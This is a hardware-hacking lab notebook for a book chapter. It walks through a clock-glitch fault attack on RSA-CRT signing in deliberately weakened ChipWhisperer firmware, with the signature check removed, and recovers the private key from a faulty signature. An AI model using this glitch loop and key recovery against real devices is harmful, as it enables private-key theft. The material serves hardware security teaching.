# Chapter 6: Bench Time: Fault Injection Lab

This notebook is a companion to Chapter 6 of The Hardware Hacking Handbook by Jasper van Woudenberg and Colin O'Flynn.

- If you'd like to use the simulator, set `SCOPETYPE` to `SIM` and `PLATFORM` to `CWLITEARM`.
- If you'd like to use ChipWhisperer hardware, set `SCOPETYPE` to `OPENADC` and `PLATFORM` to `CWLITEARM`.

© 2021. This work is licensed under a [CC BY-SA 4.0 license](https://creativecommons.org/licenses/by-sa/4.0/). 

In [None]:
SCOPETYPE = 'SIM'
PLATFORM = 'CWLITEARM'

## Firmware

Next, let's take a look at the RSA implementation we're attacking. For this attack, we'll be using the `work/projects/chipwhisperer/hardware/victims/firmware/simpleserial-rsa` project folder. There are a few files here, but the important one is `simpleserial-arm-rsa.c`. Open it. As you scroll through, you'll find all our public/private values. Next, navigate to `real_dec()`:

```C
uint8_t buf[128];
uint8_t hash[32];
uint8_t real_dec(uint8_t *pt)
{
     int ret = 0;

     //first need to hash our message
     memset(buf, 0, 128);
     mbedtls_sha256(MESSAGE, 12, hash, 0);

     trigger_high();
     ret = simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign(&rsa_ctx, NULL, NULL, MBEDTLS_RSA_PRIVATE, MBEDTLS_MD_SHA256, 32, hash, buf);
     trigger_low();

     //send back first 48 bytes
     simpleserial_put('r', 48, buf);
     return ret;
}
```

You'll notice that we first hash our message (`"Hello World!"`) using SHA256. Once this is passed to the signature function, it will be padded according to the PKCS#1 v1.5 standard. This isn't too important now, but it will be important later. Next we sign our message using `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()`, then send back the first 48 bytes of it. To avoid overflowing the CWLite's 128-byte buffer, the rest of the signature is sent back in further chunks via `sig_chunk_1()` and `sig_chunk_2()`, which are directly below this function.

We'll actually skip over `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()` here, since most of the important stuff actually happens in a different function. You should note, however, that this function has been modified to remove a signature check, which would need to be bypassed in a real attack.

Next, find the function `simpleserial_mbedtls_rsa_private()`, a cleaned up version of `mbedtls_rsa_private()`, where the signature calculation actually happens:
```C
/*
 * Do an RSA private key operation
 */
static int simpleserial_mbedtls_rsa_private( mbedtls_rsa_context *ctx,
                 int (*f_rng)(void *, unsigned char *, size_t),
                 void *p_rng,
                 const unsigned char *input,
                 unsigned char *output )

```

Scrolling down a bit, we do indeed find that this function uses CRT to speed up the calculation:

```C
    /*
     * Faster decryption using the CRT
     *
     * T1 = input ^ dP mod P
     * T2 = input ^ dQ mod Q
     */
    MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T1, &T, DP, &ctx->P, &ctx->RP ) );
    MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T2, &T, DQ, &ctx->Q, &ctx->RQ ) );
```
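To make the CRT shortcut concrete, here is a minimal Python sketch of the same two half-size exponentiations followed by a recombination. The tiny primes and the helper name `sign_crt` are illustrative assumptions, not values or functions from the firmware.

```python
# Toy RSA-CRT signing with tiny primes (illustrative only; real keys are 1024+ bits).
# Requires Python 3.8+ for pow(x, -1, n).
p, q = 61, 53
N = p * q
e = 17
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)          # full private exponent

# CRT parameters, mirroring DP, DQ and Q^-1 mod P in the C code
dP = d % (p - 1)
dQ = d % (q - 1)
q_inv = pow(q, -1, p)

def sign_crt(m):
    """Sign m using two small exponentiations instead of one large one."""
    t1 = pow(m, dP, p)                 # T1 = input ^ dP mod P
    t2 = pow(m, dQ, q)                 # T2 = input ^ dQ mod Q
    h = ((t1 - t2) * q_inv) % p        # recombination step
    return t2 + q * h

m = 65
s = sign_crt(m)
print(s == pow(m, d, N))   # CRT result matches the direct computation
print(pow(s, e, N) == m)   # and verifies under the public exponent
```

Because each half only ever touches one prime, corrupting one half leaves the other half's relationship to the message intact, which is what the attack later in this notebook exploits.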

You can view more of the firmware if you want, but for now let's build our firmware. You can ignore the warnings at the end. 

In [None]:
CRYPTO_TARGET="MBEDTLS"
CRYPTO_OPTIONS="RSA"
NANO_FLASH = "NA"
OPT = "2"
if SCOPETYPE == "CWNANO":
    NANO_FLASH = "32K" #Need nano pro 32
    OPT = "2"

In [None]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET" "$CRYPTO_OPTIONS" "$NANO_FLASH"
cd ../hardware/victims/firmware/simpleserial-rsa
make PLATFORM=$1 CRYPTO_TARGET=$2 CRYPTO_OPTIONS=$3 OPT=2 NANO_FLASH=$4

## Getting a correct signature from the target

Start by initializing the ChipWhisperer:

In [None]:
if SCOPETYPE == 'OPENADC':
    %run "Helper_Scripts/Setup_Generic.ipynb"
 
    scope.clock.adc_src = "clkgen_x1"

Next, program it with our new firmware:

In [None]:
if SCOPETYPE == 'OPENADC':
    import time
    fw_path = "../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-{}.hex".format(PLATFORM)
    cw.program_target(scope, prog, fw_path)
    time.sleep(1)

### Getting the signature

Let's start by checking that we can verify the signature we get back. First, we run the signature calculation. The `time.sleep()` call gives the calculation time to finish; you may need to increase it:

In [None]:
if SCOPETYPE == 'OPENADC':
    import time
    target.flush()
    scope.arm()
    target.write("t\n")

    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    time.sleep(2)
    output = target.read(timeout=10)
    
    print(scope.adc.trig_count)

As you can see, the signature takes a long time! For the STM32F3, it should be around 10.4M cycles. Next, let's get the rest of the signature back and see what it looks like.

In [None]:
if SCOPETYPE == 'OPENADC':
    target.write("1\n")
    time.sleep(0.2)
    output += target.read(timeout=10)

    target.write("2\n")
    time.sleep(0.2)
    output += target.read(timeout=10)
    
else: # SIM
    output = "r4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD\nz00\nr85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D\nz00\nr7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80\nz00"
    
print(output)

You should see something like:
```
r4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD
z00
r85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D
z00
r7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80
z00
```

We'll need to strip all the extra simpleserial stuff out. This can be done like so:

In [None]:
newout = output.replace("r", "").replace("\nz00","").replace("\n","")
print(newout)
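The chained `replace()` calls work here because hex digits never contain the letter `r`. A slightly more defensive sketch, assuming every payload line starts with `r` and every acknowledgement line starts with `z` (as in the output shown above), could look like this. The helper name `extract_payload` is hypothetical.

```python
def extract_payload(raw):
    """Concatenate the hex payload of every 'r' line, ignoring 'z' ack lines."""
    chunks = []
    for line in raw.splitlines():
        line = line.strip()
        if line.startswith("r"):
            chunks.append(line[1:])   # drop the leading 'r' command byte
    return "".join(chunks)

sample = "rDEADBEEF\nz00\nr0011\nz00\n"
print(extract_payload(sample))  # DEADBEEF0011
```

Parsing line by line also makes it easy to spot a missing chunk, since the number of collected `r` lines can be checked before joining them.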

Then we can convert this to binary using binascii:

In [None]:
from binascii import unhexlify, hexlify
sig = unhexlify(newout)

### Verifying the signature


Finally, we can verify that the signature is correct using the PyCryptodome package:

In [None]:
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 

from Crypto.Hash import SHA256

e = 0x10001
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
m = b"Hello World!"

hash_object = SHA256.new(data=m)
pub_key = RSA.construct((N, e))
signer = PKCS1_v1_5.new(pub_key) 
sig_check = signer.verify(hash_object, sig)
print(sig_check)

assert sig_check, "Failed to verify signature on device. Got: {}".format(newout)

If everything worked out correctly, you should see `True` printed above. Now onto the actual attack.

## Injecting the fault

This section is split into two parts: getting a simulated fault, and getting a fault from the ChipWhisperer hardware.

### Getting a simulated fault

If we're running using the RSA CRT simulator instead, we're going to build and sign the message ourselves.

As was mentioned earlier, the message that's signed isn't the original message, it's a PKCS#1 v1.5 padded hash of it. Luckily, this standard's fairly simple. PKCS#1 v1.5 padding looks like:

\|00\|01\|ff...\|00\|hash_prefix\|message_hash\|

Here, the ff... part is a string of ff bytes long enough to make the size of the padded message the same as N, while hash_prefix is an identifier number for the hash algorithm used on message_hash. In our case, SHA256 has the hash prefix `3031300d060960864801650304020105000420`.

The `build_message` function below implements this:

In [None]:
# PKCS#1 v1.5 padding
def build_message(m, N):
    sha_id = "3031300d060960864801650304020105000420"
    N_len = (len(bin(N)) - 2 + 7) // 8
    pad_len = (len(hex(N)) - 2) // 2 - 3 - len(m)//2 - len(sha_id)//2
    padded_m = "0001" + "ff" * pad_len + "00" + sha_id + m
    return padded_m

print("Message:       {}".format(m))

# Encode message
hash_object = SHA256.new(data=m)
hashed_m = hexlify(hash_object.digest()).decode()
padded_m = build_message(hashed_m, N)
msg = int.from_bytes(unhexlify(padded_m), byteorder='big') 
print("Padded/hashed: {}".format(padded_m))
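As a cross-check on the layout described above, the same padding can be built directly on bytes, which makes the field boundaries easy to inspect. This is a sketch under the assumption of a 128-byte (1024-bit) modulus; the function name `pkcs1_v15_pad` is hypothetical and uses `hashlib` rather than PyCryptodome.

```python
import hashlib

# DER-encoded DigestInfo prefix identifying SHA-256 (same value as sha_id above)
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")

def pkcs1_v15_pad(message, modulus_len):
    """Return 00 | 01 | ff... | 00 | hash_prefix | SHA-256(message) as bytes."""
    digest = hashlib.sha256(message).digest()
    tail = b"\x00" + SHA256_PREFIX + digest
    pad_len = modulus_len - 2 - len(tail)
    if pad_len < 8:
        # PKCS#1 v1.5 requires at least eight ff bytes of padding
        raise ValueError("modulus too short for PKCS#1 v1.5 padding")
    return b"\x00\x01" + b"\xff" * pad_len + tail

em = pkcs1_v15_pad(b"Hello World!", 128)
print(len(em))          # 128
print(em[:4].hex())     # 0001ffff
```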

Next, let's calculate the RSA CRT signature, without any faults. We will need the parameters `p` and `q` for this. Just note that the code to recover the primes later on does not use these.

In [None]:
from gmpy2 import invert, powmod, gcd, gcdext

if SCOPETYPE == 'SIM':
    # RSA parameters
    p = 0xc36d0eb7fcd285223cfb5aaba5bda3d82c01cad19ea484a87ea4377637e75500fcb2005c5c7dd6ec4ac023cda285d796c3d9e75e1efc42488bb4f1d13ac30a57
    q = 0xc000df51a7c77ae8d7c7370c1ff55b69e211c2b9e5db1ed0bf61d0d9899620f4910e4168387e3c30aa1e00c339a795088452dd96a9a5ea5d9dca68da636032af
    phi = (p-1)*(q-1)
    d = invert(e, phi)

    # CRT parameters
    dp = invert(e, (p-1))
    dq = invert(e, (q-1))
    qinv = invert(q, p)

    # CRT calculation
    sp = powmod(msg, dp, p)
    sq = powmod(msg, dq, q)
    s_crt = sq + q * ((sp-sq) * qinv % p)

    # Use the previously captured correct signature to verify they are the same
    s = int.from_bytes(sig, byteorder='big') 
    print("Signature:  {}".format(hex(s)))
    print("s == s_crt? {}".format(s == s_crt))

Now that we have a correct signature calculated from parts `sp` and `sq`, let's flip anywhere between 1 and 20 bits in `sp` to simulate faults. We should get a different signature.

In [None]:
from random import randint, sample

if SCOPETYPE == 'SIM':
    # Now, flip arbitrary bits in sp, and calculate corrupted signature
    bits = sorted(sample(range(0, sp.bit_length()), randint(1,20))) # Get faulty bit indices
    faults = sum([1 << x for x in bits])                            # Convert to large int
    sp_x = sp ^ faults                                              # Add faults to sp
    s_crt_x = sq + q * ((sp_x-sq) * qinv % p)                       # Calculate faulty RSA CRT signature
    print("Faults injected:     {}".format(bits))
    print("Corrupted signature: {}".format(hex(s_crt_x)))
    print("s_crt_x != s_crt?    {}".format(s_crt != s_crt_x))

### Faulting the ChipWhisperer

As usual, we'll start off by setting up the glitch module:

In [None]:
if SCOPETYPE == 'OPENADC':
    scope.glitch.clk_src = "clkgen"
    scope.glitch.output = "clock_xor"
    scope.glitch.trigger_src = "ext_single"
    scope.glitch.repeat = 1
    scope.glitch.width = -9
    scope.glitch.offset = -38.3
    scope.io.hs2 = "glitch"
    print(scope.glitch)
    from collections import namedtuple
    Range = namedtuple('Range', ['min', 'max', 'step'])

Now for our actual attack loop. There's a lot going on here, so we'll move through a little slower than usual. Overall, what we want to do is:
* Insert a glitch
* Read the signature back
* Verify that it's correct

The first step is the same as earlier. For the last two, we'll cheat a little by checking for the beginning of the correct signature before proceeding, but we could also read back the whole thing:

```python
# Read back signature
output = target.read(timeout=10)
if "4F09799" not in output:
    # Something abnormal has happened
    pass
```

Now that we've found some abnormal behaviour, we need to verify that the target hasn't crashed. This can be done pretty easily by checking if we got anything at all:

```python
if "4F09799" not in output:
    # Something abnormal has happened
    if len(output) > 0:
        # Possible glitch!
        pass
    else:
        # Crash, reset and try again
        print(f"Probably crashed at {scope.glitch.ext_offset}")
        reset_target(scope)
        time.sleep(0.5)
```
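The two checks above amount to a three-way classification of each attempt. As a sketch, that decision can be pulled into a small pure function that is easy to test without hardware. The function name `classify_response` and the label strings are hypothetical; the prefix is the start of the correct signature captured earlier.

```python
def classify_response(output, expected_prefix="4F09799"):
    """Classify one glitch attempt from the first chunk the target sent back."""
    if not output:
        return "crash"        # nothing came back: target likely needs a reset
    if expected_prefix in output:
        return "normal"       # signature starts as expected: no effect
    return "candidate"        # got data, but not the correct signature

print(classify_response(""))                      # crash
print(classify_response("r4F09799F6A59\nz00\n"))  # normal
print(classify_response("r1187B790564D\nz00\n"))  # candidate
```

Keeping the decision separate from the capture code means the loop body only has to act on the returned label.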

As a last step, we'll build our full signature and do one final check to make sure everything looks okay:

```python
if len(output) > 0:
    # Possible glitch!
    print(f"Possible glitch at offset {scope.glitch.ext_offset}\nOutput: {output}")
    
    # get rest of signature back
    target.write("1\n")
    time.sleep(0.2)
    output += target.read(timeout=10)

    target.write("2\n")
    time.sleep(0.2)
    output += target.read(timeout=10)
    
    # strip out extra simpleserial stuff
    newout = output.replace("r", "").replace("\nz00","").replace("\n","")
    
    print(f"Full output: {newout}")
    if (len(newout) == 256) and "r0001F" not in output:
        print("Very likely glitch!")
        break
```

We'll add in scanning over different offsets as well. We'll start at an offset of 7M cycles. We actually have a lot of area that we could place the glitch in, so the starting point is fairly arbitrary. For the STM32F3, this places the glitch near the beginning of the calculation for $s_2$. If you'd like, you can move `trigger_low()` into `simpleserial_mbedtls_rsa_private()` to see how long different parts of the algorithm take.

All together, our attack loop looks like this:

In [None]:
if SCOPETYPE == 'OPENADC':

    from tqdm.notebook import trange
    import time
    for i in trange(7000000, 7100000):
        scope.glitch.ext_offset = i
        scope.adc.timeout = 3
        target.flush()
        scope.arm()
        target.write("t\n")

        ret = scope.capture()
        if ret:
            print('Timeout happened during acquisition')
        time.sleep(2)

        # Read back signature
        output = target.read(timeout=10)
        if "4F09799" not in output:
            # Something abnormal happened
            if len(output) > 0:
                # Possible glitch!
                print("Possible glitch at offset {}\nOutput: {}".format(scope.glitch.ext_offset, output))

                # Get rest of signature back
                target.write("1\n")
                time.sleep(0.2)
                output += target.read(timeout=10)

                target.write("2\n")
                time.sleep(0.2)
                output += target.read(timeout=10)

                # Strip out extra simpleserial stuff
                newout = output.replace("r", "").replace("\nz00","").replace("\n","")
                print("Full output: {}".format(newout))
                if (len(newout) == 256) and "r0001F" not in output:
                    print("Very likely glitch!")
                    break
            else:
                # Crash, reset and try again
                print("Probably crashed at {}".format(scope.glitch.ext_offset))
                reset_target(scope)
                time.sleep(0.5)
                
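    # Keep the correct signature captured earlier, then convert the faulty one to an integer
    from gmpy2 import mpz
    s_crt = mpz(int.from_bytes(sig, "big"))
    s_crt_x = mpz(int.from_bytes(unhexlify(newout), "big"))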


An output from this script could be:
```
Probably crashed at 7000014
Probably crashed at 7000017
Probably crashed at 7000028
Possible glitch at offset 7000042
Output: <removed for brevity>

Full output: 1187B790564D43D48CD140A7FF890EEA713D1603D8CBC57CF070EE951479C75E93FE98AD04F535109D957F9AB9AA25DB2FB1A5521C68C986A270782B7A579A12B9AE79DF2F59ED9E6694C64C40AAD9FE46B203DB75792016EEA315F7CAA8F9AAC0FD89052FFAC29C022E32B541B150419E2B6604DDA6BF2582F62C9F7876393D
Very likely glitch!
```

## Completing The Attack

With both a faulty signature and a correct signature over the same message, we can attempt our first recovery of the primes.

In [None]:
# Recover p and q from corrupted signature and correct signature
calc_q = gcd(s_crt_x - s_crt, N)
calc_p = N // calc_q
print("Recovered p using s: {}".format(hex(calc_p)))
print("Recovered q using s: {}".format(hex(calc_q)))
print("pq == N?             {}".format(calc_q * calc_p == N))

If `pq == N`, that means we have our primes!
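It may help to see why this gcd works. The following is a short derivation, assuming the fault only disturbs the `sp` half as in the simulated fault above. Here $s$ is `s_crt`, $s'$ is `s_crt_x`, and $s_p'$ is the corrupted `sp`:

$$
\begin{aligned}
s &= s_q + q\,h, & h &= \big((s_p - s_q)\,q^{-1}\big) \bmod p,\\
s' &= s_q + q\,h', & h' &= \big((s_p' - s_q)\,q^{-1}\big) \bmod p,\\
s' - s &= q\,(h' - h).
\end{aligned}
$$

Both $h$ and $h'$ lie in $[0, p)$, so whenever the fault changes $h$ we have $0 < |h' - h| < p$. The difference $s' - s$ is therefore a multiple of $q$ but not of $p$, which gives $\gcd(s' - s, N) = q$.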

If we don't have a correct signature over the same message, we can instead extract the primes from the corrupted signature and knowledge of the message.

In [None]:
# Recover p and q from corrupted signature and message
# Reduce modulo N while exponentiating; the gcd with N is unchanged
calc_q2 = gcd(msg - powmod(s_crt_x, e, N), N)
calc_p2 = N // calc_q2
print("Recovered p using m: {}".format(hex(calc_p2)))
print("Recovered q using m: {}".format(hex(calc_q2)))
print("pq == N?             {}".format(calc_q2 * calc_p2 == N))
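The message-based recovery works because the faulty signature still satisfies $s'^e \equiv m \pmod q$, while the same congruence fails modulo $p$. The following toy sketch shows both recoveries side by side. The small primes, the single flipped bit, and the helper name `recombine` are illustrative assumptions, not values from the target.

```python
from math import gcd

# Toy RSA-CRT parameters (Python 3.8+ for pow(x, -1, n))
p, q, e = 61, 53, 17
N = p * q
d = pow(e, -1, (p - 1) * (q - 1))
dP, dQ, q_inv = d % (p - 1), d % (q - 1), pow(q, -1, p)

m = 65
sp = pow(m, dP, p)
sq = pow(m, dQ, q)
sp_faulty = sp ^ 1            # simulate a fault: flip the lowest bit of sp

def recombine(sp_val):
    """CRT recombination, same formula as the simulator cell above."""
    return sq + q * (((sp_val - sq) * q_inv) % p)

s_good = recombine(sp)
s_bad = recombine(sp_faulty)

# Recovery 1: needs a correct and a faulty signature over the same message
q_from_pair = gcd(s_bad - s_good, N)
# Recovery 2: needs only the faulty signature and the (padded) message
q_from_msg = gcd((m - pow(s_bad, e, N)) % N, N)

print(q_from_pair, q_from_msg, N // q_from_msg)  # 53 53 61
```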

Finally, there's d, which can be derived by:

In [None]:
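phi = (calc_q - 1)*(calc_p - 1)
# Avoid naming the first result `gcd`, which would shadow gmpy2's gcd() used above
g, d_test, _ = gcdext(e, phi)
d_test %= phi  # the Bezout coefficient can be negative; reduce it into [0, phi)

print("Recovered d: {}".format(hex(d_test)))
if SCOPETYPE == 'SIM':
    # The reference d is only computed in the simulator cell
    print("d_test == d? {}".format(d_test == d))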
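One detail worth keeping in mind when deriving `d` this way: the coefficient returned by an extended Euclidean routine can be negative, so it should be reduced modulo `phi` before being used or compared. The sketch below illustrates this with a hand-written `egcd` (a hypothetical helper, not the gmpy2 implementation) and toy values.

```python
def egcd(a, b):
    """Iterative extended Euclid: returns (g, x, y) with a*x + b*y == g."""
    old_r, r = a, b
    old_x, x = 1, 0
    old_y, y = 0, 1
    while r:
        quot = old_r // r
        old_r, r = r, old_r - quot * r
        old_x, x = x, old_x - quot * x
        old_y, y = y, old_y - quot * y
    return old_r, old_x, old_y

e, phi = 17, 3120          # toy values (p = 61, q = 53)
g, x, _ = egcd(e, phi)
d = x % phi                # reduce the coefficient into [0, phi)
print(g, x, d)             # 1 -367 2753
```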

Now that we have all the parameters, we can also recover the padded message hash by applying the public exponent to the correct signature.

In [None]:
# Raise the correct signature to the public exponent to recover the padded message
m_calc = int(powmod(s_crt, e, N))
print("m_calc == m? {}".format(msg == m_calc))
m_str = hexlify(m_calc.to_bytes((m_calc.bit_length() + 7) // 8, byteorder='big'))
print("Message decrypted: {}".format(m_str))

## Going Further

There's still more you can do with this attack:

* You can try glitching the other part of the signature calculation to verify that you get the other prime factor of N out
* We used clock glitching in this tutorial. You may want to try it with voltage glitching as well

As mentioned earlier in the tutorial, a verification of the calculated signature was removed:
```C
    /* Compare in constant time just in case */
    /* for( diff = 0, i = 0; i < ctx->len; i++ ) */
    /*     diff |= verif[i] ^ sig[i]; */
    /* diff_no_optimize = diff; */

    /* if( diff_no_optimize != 0 ) */
    /* { */
    /*     ret = MBEDTLS_ERR_RSA_PRIVATE_FAILED; */
    /*     goto cleanup; */
    /* } */

```

This part is near the end of `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()`. If you want a larger challenge, you can try uncommenting that and trying to glitch past it as well.